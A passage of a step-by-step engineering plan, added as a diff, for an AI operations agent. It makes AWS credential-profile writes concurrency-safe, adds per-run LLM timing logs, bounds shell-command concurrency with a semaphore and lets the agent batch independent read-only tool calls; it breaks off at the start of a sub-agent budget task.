+
+**Architecture:** The orchestrator graph (`planning-agent.ts`) keeps its exact topology. Layer A removes the prompt rules that forbid batching independent tool calls, so `ToolNode`'s existing concurrency is used. Layer B adds `dispatch_agent` as an ordinary tool — the orchestrator emits several in one turn and `ToolNode` fans them out. Each sub-agent is an ephemeral, non-checkpointed ReAct loop restricted to read-only tools that returns one compressed report, so raw tool output never enters the orchestrator's context.
+
+**Tech Stack:** TypeScript 5, Next.js 15.5.15 App Router, LangChain/LangGraph, Prisma 5 (web-ui), Vitest 4, TanStack Query 5, React Hook Form + Zod 4, sonner, Tailwind + Radix (shadcn/ui).
+
+**Spec:** `docs/superpowers/specs/2026-07-26-aiops-subagent-orchestration-design.md`
+
+## Global Constraints
+
+- **Working directory for all commands:** `apps/web-ui` unless stated otherwise. Tests run with `bun run test` (this is `vitest run` — single pass, not watch).
+- **Path alias:** `@/` maps to `apps/web-ui/`. Use it for all cross-directory imports; relative imports only within the same directory.
+- **Indentation:** 4 spaces in `lib/` and `app/api/` files; 2 spaces in `components/`. Match the file you are editing.
+- **Multi-tenant safety:** every DB query is scoped via `getTenantClient(tenantId)`. Data access goes through the repository factory (`@/lib/db/repository-factory`), never Prisma directly from a route or service.
+- **API responses:** `NextResponse.json({ success: true, data }, { status })` or `{ success: false, error: string }`.
+- **RBAC:** every mutating route calls `authorize(action, Subject)` from `@/lib/rbac/authorize`. The `Agent` subject already maps to the `AIOps` module (`lib/rbac/types.ts:33`) — do not add a new subject.
+- **Toasts:** import `toast` from `"sonner"` directly in new code.
+- **Forms:** React Hook Form + `@hookform/resolvers/zod` + Zod 4. Do not build forms with manual `useState`.
+- **Zod 4:** use `err.issues` (not `.errors`); `z.record()` requires the two-arg key+value form.
+- **UI primitives:** consume `components/ui/*`; never modify them.
+- **Never claim a step passes without running the command and reading its output.**
+
+---
+
+### Task 1: Make AWS session-profile writes concurrency-safe
+
+Parallel tool calls and parallel sub-agents both call `get_aws_credentials` concurrently. `createSessionProfile` currently does an unlocked read-modify-write of one shared file, so concurrent callers silently lose each other's profiles and the agent then fails with "The config profile could not be found". This task is a hard prerequisite for Tasks 3 and 7.
+
+**Files:**
+- Modify: `apps/web-ui/lib/agent/session-manager.ts`
+- Modify: `apps/web-ui/lib/agent/aws-credentials-tool.ts:100-121`
+- Test: `apps/web-ui/lib/agent/session-manager.test.ts` (create)
+
+**Interfaces:**
+- Consumes: nothing from earlier tasks.
+- Produces:
+  - `createSessionProfile(accountId: string, credentials: AwsCredentials, tenantId?: string): Promise<SessionProfile>` — unchanged signature, now serialized.
+  - `getOrCreateSessionProfile(accountId: string, tenantId: string, assume: () => Promise<AwsCredentials>): Promise<SessionProfile>` — returns a cached profile when it has more than `PROFILE_REFRESH_MARGIN_MS` of life left, otherwise assumes fresh credentials via the `assume` callback.
+  - `__resetProfileCacheForTests(): void`
+
+- [ ] **Step 1: Write the failing concurrency test**
+
+Create `apps/web-ui/lib/agent/session-manager.test.ts`:
+
+```typescript
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import * as fs from 'fs/promises';
+import * as os from 'os';
+import * as path from 'path';
+
+import {
+    createSessionProfile,
+    getOrCreateSessionProfile,
+    getTenantCredentialsFilePath,
+    __resetProfileCacheForTests,
+} from './session-manager';
+
+const TENANT = 'tenant-concurrency-test';
+
+function creds(region = 'us-east-1') {
+    return {
+        accessKeyId: 'AKIAEXAMPLE',
+        secretAccessKey: 'secret',
+        sessionToken: 'token',
+        region,
+    };
+}
+
+beforeEach(() => {
+    __resetProfileCacheForTests();
+});
+
+afterEach(async () => {
+    await fs.rm(path.dirname(getTenantCredentialsFilePath(TENANT)), { recursive: true, force: true });
+});
+
+describe('createSessionProfile concurrency', () => {
+    it('keeps every profile when 10 callers write at the same time', async () => {
+        const accountIds = Array.from({ length: 10 }, (_, i) => `10000000000${i}`);
+
+        const profiles = await Promise.all(
+            accountIds.map(id => createSessionProfile(id, creds(), TENANT)),
+        );
+
+        const contents = await fs.readFile(getTenantCredentialsFilePath(TENANT), 'utf-8');
+        for (const profile of profiles) {
+            expect(contents).toContain(`[${profile.profileName}]`);
+        }
+    });
+
+    it('writes the credentials file atomically (no partial content observed)', async () => {
+        await createSessionProfile('222222222222', creds(), TENANT);
+        const filePath = getTenantCredentialsFilePath(TENANT);
+        const stat = await fs.stat(filePath);
+        expect(stat.mode & 0o777).toBe(0o600);
+
+        const dir = path.dirname(filePath);
+        const leftovers = (await fs.readdir(dir)).filter(f => f.endsWith('.tmp'));
+        expect(leftovers).toEqual([]);
+    });
+});
+
+describe('getOrCreateSessionProfile caching', () => {
+    it('reuses a fresh profile instead of assuming again', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        const first = await getOrCreateSessionProfile('333333333333', TENANT, assume);
+        const second = await getOrCreateSessionProfile('333333333333', TENANT, assume);
+
+        expect(assume).toHaveBeenCalledTimes(1);
+        expect(second.profileName).toBe(first.profileName);
+    });
+
+    it('re-assumes when the cached profile is near expiry', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        const first = await getOrCreateSessionProfile('444444444444', TENANT, assume);
+        // Force the cached entry to be 30s from expiry — inside the 120s refresh margin.
+        first.expiresAt = new Date(Date.now() + 30_000);
+
+        const second = await getOrCreateSessionProfile('444444444444', TENANT, assume);
+
+        expect(assume).toHaveBeenCalledTimes(2);
+        expect(second.profileName).not.toBe(first.profileName);
+    });
+
+    it('scopes the cache by tenant', async () => {
+        const assume = vi.fn().mockResolvedValue(creds());
+
+        await getOrCreateSessionProfile('555555555555', TENANT, assume);
+        await getOrCreateSessionProfile('555555555555', `${TENANT}-other`, assume);
+
+        expect(assume).toHaveBeenCalledTimes(2);
+        await fs.rm(path.dirname(getTenantCredentialsFilePath(`${TENANT}-other`)), { recursive: true, force: true });
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/session-manager.test.ts`
+
+Expected: FAIL. `getOrCreateSessionProfile` and `__resetProfileCacheForTests` are not exported, so the import fails to resolve.
+
+- [ ] **Step 3: Add the per-file lock and atomic write**
+
+In `apps/web-ui/lib/agent/session-manager.ts`, add `randomUUID` to the imports:
+
+```typescript
+import { randomUUID } from 'crypto';
+```
+
+Then add the lock helper immediately after the `PROFILE_PREFIX` constant (around line 53):
+
+```typescript
+/**
+ * Serializes read-modify-write cycles per credentials file.
+ *
+ * Node is single-threaded, but `await` between the read and the write yields the
+ * event loop: two concurrent callers both read the old content and the second
+ * write clobbers the first caller's profile. The victim then runs
+ * `aws --profile <name>` against a profile that is not in the file and gets
+ * "The config profile could not be found". Chaining every mutation onto a
+ * per-path promise removes the interleaving window.
+ *
+ * The map is keyed by resolved file path, so the legacy shared-file path is
+ * covered too. Key count is bounded by tenant count, so it is not a leak.
+ */
+const fileLocks = new Map<string, Promise<unknown>>();
+
+function withFileLock<T>(filePath: string, fn: () => Promise<T>): Promise<T> {
+    const previous = fileLocks.get(filePath) ?? Promise.resolve();
+    // Run `fn` whether the predecessor resolved or rejected — one caller's
+    // failure must not deadlock every later caller on the same file.
+    const next = previous.then(fn, fn);
+    fileLocks.set(filePath, next.catch(() => undefined));
+    return next;
+}
+```
+
+Replace the body of `writeCredentialsFile` (line 90) with an atomic write:
+
+```typescript
+async function writeCredentialsFile(filePath: string, content: string): Promise<void> {
+    const dir = path.dirname(filePath);
+    await fs.mkdir(dir, { recursive: true });
+    // Write-then-rename: a concurrent reader (the AWS CLI) never observes a
+    // half-written credentials file. The temp file is created in the same
+    // directory so the rename stays on one filesystem and is therefore atomic.
+    const tmpPath = path.join(dir, `.credentials.${process.pid}.${randomUUID()}.tmp`);
+    try {
+        await fs.writeFile(tmpPath, content, { mode: 0o600 });
+        await fs.rename(tmpPath, filePath);
+    } catch (error) {
+        await fs.rm(tmpPath, { force: true }).catch(() => undefined);
+        throw error;
+    }
+}
+```
+
+Wrap the read-modify-write inside `createSessionProfile`. Replace lines 159-172 (from `// Read current credentials file` through the `writeCredentialsFile` call) with:
+
+```typescript
+    await withFileLock(credentialsFile, async () => {
+        const content = await readCredentialsFile(credentialsFile);
+        const profiles = parseCredentialsFile(content);
+
+        const profileCreds = new Map<string, string>();
+        profileCreds.set('aws_access_key_id', credentials.accessKeyId);
+        profileCreds.set('aws_secret_access_key', credentials.secretAccessKey);
+        profileCreds.set('aws_session_token', credentials.sessionToken);
+        profileCreds.set('region', credentials.region);
+        profiles.set(profileName, profileCreds);
+
+        await writeCredentialsFile(credentialsFile, serializeCredentialsFile(profiles));
+    });
+```
+
+- [ ] **Step 4: Add the profile cache with refresh-on-near-expiry**
+
+Append to `apps/web-ui/lib/agent/session-manager.ts`, before the module-load cleanup call on line 233:
+
+```typescript
+/**
+ * Re-assume when a cached profile has less than this much life left. STS
+ * credentials here last 900s (see assumeRoleForAccount); handing back a profile
+ * with 10s remaining guarantees the next AWS CLI call fails mid-flight.
+ */
+const PROFILE_REFRESH_MARGIN_MS = 120_000;
+
+const profileCache = new Map<string, SessionProfile>();
+
+function profileCacheKey(tenantId: string, accountId: string): string {
+    return `${tenantId}:${accountId}`;
+}
+
+/**
+ * Return a usable session profile for (tenant, account), assuming fresh
+ * credentials only when there is no cached profile or the cached one is within
+ * PROFILE_REFRESH_MARGIN_MS of expiry.
+ *
+ * Fan-out makes this matter twice over: N sub-agents auditing the same account
+ * previously triggered N AssumeRole calls, and a long run could hand out a
+ * profile that expired before it was used.
+ */
+export async function getOrCreateSessionProfile(
+    accountId: string,
+    tenantId: string,
+    assume: () => Promise<AwsCredentials>,
+): Promise<SessionProfile> {
+    const key = profileCacheKey(tenantId, accountId);
+    const cached = profileCache.get(key);
+    if (cached && cached.expiresAt.getTime() - Date.now() > PROFILE_REFRESH_MARGIN_MS) {
+        console.log(`[SessionManager] Reusing cached profile ${cached.profileName} for ${key}`);
+        return cached;
+    }
+
+    const credentials = await assume();
+    const profile = await createSessionProfile(accountId, credentials, tenantId);
+    profileCache.set(key, profile);
+    return profile;
+}
+
+/** Test seam — clears the in-process profile cache between test cases. */
+export function __resetProfileCacheForTests(): void {
+    profileCache.clear();
+    fileLocks.clear();
+}
+```
+
+- [ ] **Step 5: Run the tests to verify they pass**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/session-manager.test.ts`
+
+Expected: PASS, 5 tests.
+
+- [ ] **Step 6: Route `get_aws_credentials` through the cache**
+
+In `apps/web-ui/lib/agent/aws-credentials-tool.ts`, change the import on line 5:
+
+```typescript
+import { getOrCreateSessionProfile } from './session-manager';
+```
+
+Replace lines 100-121 (the assume-then-create block, from `// 2. Assume the role` through the two `console.log` lines that follow profile creation) with:
+
+```typescript
+                // 2/3/4. Resolve region, then get a cached-or-fresh session profile.
+                // getOrCreateSessionProfile only calls STS when there is no live
+                // profile left for this (tenant, account) pair.
+                const region = account.regions?.[0] || env.AWS_REGION || env.NEXT_PUBLIC_AWS_REGION || 'us-east-1';
+
+                const profile = await getOrCreateSessionProfile(accountId, tenantId, async () => {
+                    const { credentials } = await assumeRoleForAccount(
+                        account.roleArn!,
+                        account.externalId,
+                    );
+                    return {
+                        accessKeyId: credentials.AccessKeyId!,
+                        secretAccessKey: credentials.SecretAccessKey!,
+                        sessionToken: credentials.SessionToken!,
+                        region,
+                    };
+                });
+
+                console.log(`[Tool] Profile: ${profile.profileName} for account: ${accountId}`);
+                console.log(`[Tool] Profile expires at: ${profile.expiresAt.toISOString()}`);
+```
+
+The `region` const previously declared at line 107 is now declared above — delete the old declaration so there is no duplicate binding.
+
+- [ ] **Step 7: Typecheck and run the full agent test suite**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no errors in `lib/agent/session-manager.ts` or `lib/agent/aws-credentials-tool.ts`.
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/`
+Expected: PASS. Note the pre-existing failing mock-harness tests recorded in project memory — compare against the count on `git stash`ed baseline if anything looks new.
+
+- [ ] **Step 8: Commit**
+
+```bash
+git add apps/web-ui/lib/agent/session-manager.ts apps/web-ui/lib/agent/aws-credentials-tool.ts apps/web-ui/lib/agent/session-manager.test.ts
+git commit -m "fix(agent): make AWS session-profile writes concurrency-safe
+
+Unlocked read-modify-write on the shared per-tenant credentials file let
+concurrent get_aws_credentials calls silently drop each other's profiles,
+surfacing as 'The config profile could not be found'. Serialize per file,
+write atomically via rename, and cache profiles with refresh-on-near-expiry
+so fan-out does not multiply AssumeRole calls."
+```
+
+---
+
+### Task 2: Per-run timing summary
+
+Establishes the measurement baseline before any behaviour changes, so Layer A's and Layer B's contributions are attributable rather than assumed. `llmAuditLog` already computes per-call latency and token counts but discards them unless `LLM_AUDIT` is on.
+
+**Files:**
+- Create: `apps/web-ui/lib/agent/run-timings.ts`
+- Create: `apps/web-ui/lib/agent/run-timings.test.ts`
+- Modify: `apps/web-ui/lib/agent/planning-agent.ts` (5 call sites)
+- Modify: `apps/web-ui/app/api/chat/route.ts` (stream teardown)
+
+**Interfaces:**
+- Consumes: nothing from earlier tasks.
+- Produces:
+  - `recordNodeTiming(threadId: string | undefined, node: string, latencyMs: number, tokensIn: number, tokensOut: number): void`
+  - `summarizeRun(threadId: string): RunTimingSummary | null`
+  - `logRunSummary(threadId: string): void` — logs and then discards the run's entry.
+  - `interface RunTimingSummary { totalLlmMs: number; totalTokensIn: number; totalTokensOut: number; byNode: Record<string, { calls: number; ms: number; tokensIn: number; tokensOut: number }> }`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `apps/web-ui/lib/agent/run-timings.test.ts`:
+
+```typescript
+import { describe, it, expect, beforeEach } from 'vitest';
+import { recordNodeTiming, summarizeRun, logRunSummary, __resetRunTimingsForTests } from './run-timings';
+
+beforeEach(() => __resetRunTimingsForTests());
+
+describe('run timings', () => {
+    it('aggregates calls per node', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 1000, 500, 100);
+        recordNodeTiming('t1', 'EXECUTOR', 2000, 600, 150);
+        recordNodeTiming('t1', 'REFLECTOR', 500, 200, 50);
+
+        const summary = summarizeRun('t1')!;
+
+        expect(summary.totalLlmMs).toBe(3500);
+        expect(summary.totalTokensIn).toBe(1300);
+        expect(summary.totalTokensOut).toBe(300);
+        expect(summary.byNode.EXECUTOR).toEqual({ calls: 2, ms: 3000, tokensIn: 1100, tokensOut: 250 });
+        expect(summary.byNode.REFLECTOR.calls).toBe(1);
+    });
+
+    it('keeps runs isolated by threadId', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 1000, 10, 10);
+        recordNodeTiming('t2', 'EXECUTOR', 5000, 20, 20);
+
+        expect(summarizeRun('t1')!.totalLlmMs).toBe(1000);
+        expect(summarizeRun('t2')!.totalLlmMs).toBe(5000);
+    });
+
+    it('ignores calls with no threadId rather than throwing', () => {
+        expect(() => recordNodeTiming(undefined, 'EXECUTOR', 100, 1, 1)).not.toThrow();
+        expect(summarizeRun('t1')).toBeNull();
+    });
+
+    it('discards the run after logging its summary', () => {
+        recordNodeTiming('t1', 'EXECUTOR', 100, 1, 1);
+        logRunSummary('t1');
+        expect(summarizeRun('t1')).toBeNull();
+    });
+
+    it('returns null for an unknown thread', () => {
+        expect(summarizeRun('never-seen')).toBeNull();
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/run-timings.test.ts`
+Expected: FAIL — cannot resolve `./run-timings`.
+
+- [ ] **Step 3: Implement the module**
+
+Create `apps/web-ui/lib/agent/run-timings.ts`:
+
+```typescript
+/**
+ * Per-run LLM timing accumulator.
+ *
+ * llmAuditLog already measures latency and tokens for every model call, but
+ * throws the numbers away unless LLM_AUDIT is enabled. This module keeps a
+ * lightweight always-on aggregate so a run's wall time can be attributed to
+ * specific graph nodes — the baseline needed to tell whether parallelism
+ * actually helped.
+ *
+ * Keyed by threadId because runs are concurrent within one process.
+ */
+
+export interface NodeTiming {
+    calls: number;
+    ms: number;
+    tokensIn: number;
+    tokensOut: number;
+}
+
+export interface RunTimingSummary {
+    totalLlmMs: number;
+    totalTokensIn: number;
+    totalTokensOut: number;
+    byNode: Record<string, NodeTiming>;
+}
+
+/** Backstop against unbounded growth if a run never reaches its teardown. */
+const MAX_TRACKED_RUNS = 200;
+
+const runs = new Map<string, Record<string, NodeTiming>>();
+
+export function recordNodeTiming(
+    threadId: string | undefined,
+    node: string,
+    latencyMs: number,
+    tokensIn: number,
+    tokensOut: number,
+): void {
+    if (!threadId) return;
+
+    let byNode = runs.get(threadId);
+    if (!byNode) {
+        if (runs.size >= MAX_TRACKED_RUNS) {
+            // Evict the oldest insertion — Map preserves insertion order.
+            const oldest = runs.keys().next().value;
+            if (oldest !== undefined) runs.delete(oldest);
+        }
+        byNode = {};
+        runs.set(threadId, byNode);
+    }
+
+    const entry = byNode[node] ?? { calls: 0, ms: 0, tokensIn: 0, tokensOut: 0 };
+    entry.calls += 1;
+    entry.ms += latencyMs;
+    entry.tokensIn += tokensIn;
+    entry.tokensOut += tokensOut;
+    byNode[node] = entry;
+}
+
+export function summarizeRun(threadId: string): RunTimingSummary | null {
+    const byNode = runs.get(threadId);
+    if (!byNode) return null;
+
+    let totalLlmMs = 0;
+    let totalTokensIn = 0;
+    let totalTokensOut = 0;
+    for (const entry of Object.values(byNode)) {
+        totalLlmMs += entry.ms;
+        totalTokensIn += entry.tokensIn;
+        totalTokensOut += entry.tokensOut;
+    }
+
+    return { totalLlmMs, totalTokensIn, totalTokensOut, byNode };
+}
+
+export function logRunSummary(threadId: string): void {
+    const summary = summarizeRun(threadId);
+    runs.delete(threadId);
+    if (!summary) return;
+
+    const rows = Object.entries(summary.byNode)
+        .sort((a, b) => b[1].ms - a[1].ms)
+        .map(([node, t]) =>
+            `   ${node.padEnd(12)} calls=${String(t.calls).padStart(3)}  llm=${(t.ms / 1000).toFixed(1)}s  in=${t.tokensIn}  out=${t.tokensOut}`);
+
+    console.log(
+        `\n📊 [RUN SUMMARY] thread=${threadId}\n` +
+        `   TOTAL        llm=${(summary.totalLlmMs / 1000).toFixed(1)}s  in=${summary.totalTokensIn}  out=${summary.totalTokensOut}\n` +
+        rows.join('\n'),
+    );
+}
+
+/** Test seam. */
+export function __resetRunTimingsForTests(): void {
+    runs.clear();
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/run-timings.test.ts`
+Expected: PASS, 5 tests.
+
+- [ ] **Step 5: Record timings from the planning-agent nodes**
+
+In `apps/web-ui/lib/agent/planning-agent.ts`, add to the imports from `./run-timings`:
+
+```typescript
+import { recordNodeTiming } from "./run-timings";
+```
+
+Three nodes do not currently receive the runtime config. Change their signatures so a threadId is available:
+
+- `planNode(state: ReflectionState)` → `planNode(state: ReflectionState, runtimeConfig?: any)`
+- `reflectNode(state: ReflectionState)` → `reflectNode(state: ReflectionState, runtimeConfig?: any)`
+- `finalNode(state: ReflectionState)` → `finalNode(state: ReflectionState, runtimeConfig?: any)`
+
+LangGraph already passes `(state, config)` to every node, so no `addNode` call changes.
+
+Then, immediately after each `llmAuditLog(...)` call, add the matching `recordNodeTiming` line. There are five call sites; each uses the `_auditStart_*` timestamp already in scope:
+
+```typescript
+// after llmAuditLog('PLANNER', _auditInputs_plan, response, _auditStart_plan);
+recordNodeTiming(runtimeConfig?.configurable?.thread_id, 'PLANNER', Date.now() - _auditStart_plan,
+    (response as any).usage_metadata?.input_tokens ?? 0, (response as any).usage_metadata?.output_tokens ?? 0);
+```
+
+Repeat with these node labels and variables:
+
+| Node function | Label | Start var | Response var |
+|---|---|---|---|
+| `planNode` | `'PLANNER'` | `_auditStart_plan` | `response` |
+| `generateNode` | `'EXECUTOR'` | `_auditStart_exec` | `response` |
+| `reflectNode` | `'REFLECTOR'` | `_auditStart_ref` | `response` |
+| `reviseNode` | `'REVISER'` | `_auditStart_rev` | `response` |
+| `finalNode` | `'FINAL'` | `_auditStart_fin` | `summaryResponse` |
+
+`generateNode` and `reviseNode` already receive `runtimeConfig`.
+
+- [ ] **Step 6: Log the summary when the stream ends**
+
+In `apps/web-ui/app/api/chat/route.ts`, add the import:
+
+```typescript
+import { logRunSummary } from '@/lib/agent/run-timings';
+```
+
+Find the `for await (const event of stream)` loop (line 826). Locate the enclosing `try`/`finally` (or the point where the stream completes and the controller is closed) and add to the teardown path:
+
+```typescript
+                    // Emit the per-run timing breakdown regardless of how the run ended,
+                    // so aborted and errored runs are measured too.
+                    logRunSummary(threadId);
+```
+
+- [ ] **Step 7: Verify typecheck and tests**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/`
+Expected: PASS (same pre-existing failures as the Task 1 baseline, no new ones).
+
+- [ ] **Step 8: Capture the baseline manually**
+
+Start the app (`docker compose up -d postgres` at repo root, then `cd apps/web-ui && bun run dev`), run one representative slow AI Ops chat task, and copy the `📊 [RUN SUMMARY]` block from the server log into the commit message. This is the number every later task is measured against.
+
+- [ ] **Step 9: Commit**
+
+```bash
+git add apps/web-ui/lib/agent/run-timings.ts apps/web-ui/lib/agent/run-timings.test.ts apps/web-ui/lib/agent/planning-agent.ts apps/web-ui/app/api/chat/route.ts
+git commit -m "feat(agent): per-run LLM timing summary
+
+Aggregates the latency and token counts llmAuditLog already computes into a
+per-node breakdown logged at run end, so the cost of each graph node is
+attributable before parallelism changes land."
+```
+
+---
+
+### Task 3: Layer A — allow batched parallel tool calls
+
+`ToolNode` already executes multiple `tool_calls` from one AI message concurrently. The executor prompt forbids using that, turning an N-way independent sweep into N serial laps. This task removes the prohibition and bounds the resulting shell-command concurrency.
+
+**Files:**
+- Create: `apps/web-ui/lib/agent/concurrency.ts`
+- Create: `apps/web-ui/lib/agent/concurrency.test.ts`
+- Modify: `apps/web-ui/lib/agent/tools.ts:101-157` (`executeCommandTool`)
+- Modify: `apps/web-ui/lib/agent/planning-agent.ts:402-407` (executor prompt), `:291-292` (planner prompt), `:750-759` (reviser prompt)
+
+**Interfaces:**
+- Consumes: nothing from earlier tasks.
+- Produces: `class Semaphore { constructor(limit: number); run<T>(fn: () => Promise<T>): Promise<T> }`
+
+- [ ] **Step 1: Write the failing semaphore test**
+
+Create `apps/web-ui/lib/agent/concurrency.test.ts`:
+
+```typescript
+import { describe, it, expect } from 'vitest';
+import { Semaphore } from './concurrency';
+
+const defer = () => {
+    let resolve!: () => void;
+    const promise = new Promise<void>(r => { resolve = r; });
+    return { promise, resolve };
+};
+
+describe('Semaphore', () => {
+    it('never runs more than `limit` tasks at once', async () => {
+        const sem = new Semaphore(2);
+        let active = 0;
+        let peak = 0;
+
+        const task = async () => sem.run(async () => {
+            active++;
+            peak = Math.max(peak, active);
+            await new Promise(r => setTimeout(r, 5));
+            active--;
+        });
+
+        await Promise.all(Array.from({ length: 10 }, task));
+
+        expect(peak).toBe(2);
+        expect(active).toBe(0);
+    });
+
+    it('releases the slot when a task throws', async () => {
+        const sem = new Semaphore(1);
+
+        await expect(sem.run(async () => { throw new Error('boom'); })).rejects.toThrow('boom');
+
+        // If the slot leaked, this would hang rather than resolve.
+        await expect(sem.run(async () => 'ok')).resolves.toBe('ok');
+    });
+
+    it('queues callers beyond the limit and runs them as slots free', async () => {
+        const sem = new Semaphore(1);
+        const first = defer();
+        const order: string[] = [];
+
+        const a = sem.run(async () => { order.push('a-start'); await first.promise; order.push('a-end'); });
+        const b = sem.run(async () => { order.push('b-start'); });
+
+        expect(order).toEqual(['a-start']);
+        first.resolve();
+        await Promise.all([a, b]);
+        expect(order).toEqual(['a-start', 'a-end', 'b-start']);
+    });
+
+    it('treats a limit below 1 as 1', async () => {
+        const sem = new Semaphore(0);
+        await expect(sem.run(async () => 'ok')).resolves.toBe('ok');
+    });
+});
+```
+
+- [ ] **Step 2: Run the test to verify it fails**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/concurrency.test.ts`
+Expected: FAIL — cannot resolve `./concurrency`.
+
+- [ ] **Step 3: Implement the semaphore**
+
+Create `apps/web-ui/lib/agent/concurrency.ts`:
+
+```typescript
+/**
+ * Minimal counting semaphore.
+ *
+ * Once the executor is allowed to emit many tool calls in one turn, ToolNode
+ * runs them all concurrently. That is the point — but execute_command spawns a
+ * real subprocess per call, so an unbounded 45-call turn would fork 45 shells
+ * inside the web-ui container. This bounds that specific blast radius.
+ */
+export class Semaphore {
+    private available: number;
+    private readonly waiters: Array<() => void> = [];
+
+    constructor(limit: number) {
+        this.available = Math.max(1, Math.floor(limit));
+    }
+
+    async run<T>(fn: () => Promise<T>): Promise<T> {
+        await this.acquire();
+        try {
+            return await fn();
+        } finally {
+            this.release();
+        }
+    }
+
+    private acquire(): Promise<void> {
+        if (this.available > 0) {
+            this.available--;
+            return Promise.resolve();
+        }
+        return new Promise<void>(resolve => this.waiters.push(resolve));
+    }
+
+    private release(): void {
+        const next = this.waiters.shift();
+        if (next) {
+            // Hand the slot straight to the next waiter — do not increment, or a
+            // third caller could take the slot we just promised away.
+            next();
+            return;
+        }
+        this.available++;
+    }
+}
+```
+
+- [ ] **Step 4: Run the test to verify it passes**
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/concurrency.test.ts`
+Expected: PASS, 4 tests.
+
+- [ ] **Step 5: Bound shell-command concurrency**
+
+In `apps/web-ui/lib/agent/tools.ts`, add the import near the top:
+
+```typescript
+import { Semaphore } from './concurrency';
+```
+
+Add below the `MAX_OUTPUT_LENGTH` constant (line 83):
+
+```typescript
+/**
+ * Caps concurrent shell subprocesses across the whole process. Other tools
+ * (AWS SDK, Prisma, MCP) are network/DB calls that are already pooled by their
+ * own clients, so only execute_command needs an explicit bound.
+ */
+const TOOL_CONCURRENCY = Number(process.env.TOOL_CONCURRENCY) || 6;
+const commandSemaphore = new Semaphore(TOOL_CONCURRENCY);
+```
+
+In `executeCommandTool`, wrap the `execAsync` call (line 131). Replace:
+
+```typescript
+            const { stdout, stderr } = await execAsync(command, {
+```
+
+with:
+
+```typescript
+            const { stdout, stderr } = await commandSemaphore.run(() => execAsync(command, {
+```
+
+and close the extra paren on the options object — the closing `});` on line 136 becomes `}));`.
+
+- [ ] **Step 6: Replace the anti-batching prompt rules**
+
+In `apps/web-ui/lib/agent/planning-agent.ts`, in `generateNode`'s `## Execution Discipline` block, replace this line (line 404):
+
+```
+- Execute exactly the current step — do not skip ahead or bundle future steps into a single call.
+```
+
+with:
+
+```
+- Execute the current step. When that step covers several INDEPENDENT read-only lookups (different accounts, regions, or services), issue them as MULTIPLE tool calls in this single turn — they run in parallel. One call per turn for independent reads wastes minutes.
+- Calls that DEPEND on each other must stay sequential: if call B needs call A's output (an account id, a resource id, a profile name), make call A now and call B on the next turn.
+- Never batch mutations. Issue at most ONE state-changing call per turn so each is reviewed and approved individually.
+- Do not skip ahead to later plan steps.
+```
+
+In `planNode`'s `## Rules for Plan Steps`, replace line 292:
+
+```
+- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region).
+```
+
+with:
+
+```
+- Keep the plan SHORT: never more than 7 steps. Merge related read-only queries into a single step (e.g., one step for "inventory EC2 + RDS + EBS across regions", not one step per service per region). The executor issues the individual queries in that step as parallel tool calls, so a merged step costs no more time than a narrow one.
+```
+
+In `reviseNode`'s `## Revision Approach`, append a ninth item after item 8 (line 759):
+
+```
+9. When the fix requires several independent read-only re-checks, issue them as multiple tool calls in this single turn rather than one per turn.
+```
+
+- [ ] **Step 7: Verify typecheck and tests**
+
+Run: `cd apps/web-ui && bunx tsc --noEmit`
+Expected: no new errors.
+
+Run: `cd apps/web-ui && bunx vitest run lib/agent/`
+Expected: PASS with no new failures.
+
+- [ ] **Step 8: Measure against the Task 2 baseline**
+
+Re-run the same representative task used in Task 2 Step 8. Compare the `📊 [RUN SUMMARY]` `EXECUTOR calls=` count and total wall time. A large drop in executor call count is the signal this task worked. Record both numbers in the commit message.
+
+- [ ] **Step 9: Commit**
+
+```bash
+git add apps/web-ui/lib/agent/concurrency.ts apps/web-ui/lib/agent/concurrency.test.ts apps/web-ui/lib/agent/tools.ts apps/web-ui/lib/agent/planning-agent.ts
+git commit -m "perf(agent): allow batched parallel tool calls in one executor turn
+
+ToolNode already ran multiple tool_calls concurrently; the executor prompt
+forbade emitting them, so an N-way independent sweep cost N serial LLM laps.
+Independent read-only calls now batch into one turn while dependent calls and
+mutations stay sequential. Shell subprocesses are bounded by TOOL_CONCURRENCY."
+```
+
+---
+
+### Task 4: Sub-agent budget resolution
+
+Pure configuration logic with no I/O beyond the tenant-config read, so it is fully unit-testable and can land before anything consumes it. Mirrors `lib/agent-ops/agent-ops-defaults.ts`.
+
+**Files:**
+- Create: `apps/web-ui/lib/agent/subagent-budget.ts`
+- Create: `apps/web-ui/lib/agent/subagent-budget.test.ts`
+
+**Interfaces:**
+- Consumes: `TenantConfigService.getConfig` from `@/lib/tenant-config-service`.
+- Produces:
+  - `const SUBAGENT_CONFIG_KEY = 'aiops-subagents'`
+  - `interface SubagentBudgetConfig { enabled: boolean; maxConcurrentSubagents: number; maxSubagentsPerRun: number; maxSubagentTokensPerRun: number; subagentMaxIterations: number; subagentTimeoutMs: number }`
+  - `const BUDGET_BOUNDS: Record<keyof Omit<SubagentBudgetConfig, 'enabled'>, { min: number; max: number; default: number }>`
+  - `platformSubagentsEnabled(): boolean`
+  - `clampBudget(input: Partial<SubagentBudgetConfig> | null): SubagentBudgetConfig`
+  - `resolveSubagentBudget(tenantId: string): Promise<SubagentBudgetConfig>`
+  - `validateBudgetInput(input: unknown): string | null`
+
+- [ ] **Step 1: Write the failing test**
+
+Create `apps/web-ui/lib/agent/subagent-budget.test.ts`:
+
